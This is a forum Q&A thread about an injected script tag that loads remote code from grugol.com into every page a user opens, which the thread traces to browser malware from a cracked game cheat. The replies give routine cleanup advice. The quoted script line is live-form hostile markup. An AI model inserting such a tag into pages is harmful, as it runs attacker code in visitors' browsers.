Malicious code on all pages

Asked

Viewed 1,645 times

4

Hi, I went to cPanel and saw by browser that some script was being loaded from another site. Upon seeing the source code, I came across the following code:

<script src='http://grugol.com/prog/landing.php?app=MjAtODktODQtMEMtOTktMTQ=&partner=200'></script>

It appears on every page of the site, on every website hosted on that cPanel account, and even on Cpanel itself, file manager. How can I remove it?

  • Access all files and remove. The site has been hacked for sure!

  • 1

    Dude, I just figured out what it was, I use crack for CS GO and this crack was running the living.exe process that was infecting the pages

1 answer

1

First you have to make sure it is on the server or in your browser. If you access the source code from the browser, there is a good chance that it is only your browser, that is, your PC, if you already access the source code from FTP in a text editor and see this script, it means that the site has been hacked.

First you should review the logs and review the security of your website and if possible change the passwords. It is recommended to solve the problem that caused this invasion, as it may happen again.

Restore a newer backup if you haven’t removed the site from the air until the issue can be resolved.

There is no magic method to undo the hack, just restoring backup or reviewing all the code for changes.

And remember that it will be necessary to discover the cause, or you will be invaded again.

  • Hello, thank you for the reply. All pages opened in any PC browser carry this code. What can I do to remove this code? Format the machine?

  • Did you check the source code of the files on an FTP? If the files there from FTP are infected, then it is not the machine, still it should investigate the causes of the problem.

  • I believe they are browsers because when I access any site with Firefox or Chrome (globe.com for example), the same code appears. Now when I access any site (including mine) by Microsoft Edge, nothing appears in the source code.

  • @Football then is your browsers that are infected and not your server.

Browser other questions tagged

You are not signed in. Login or sign up in order to post.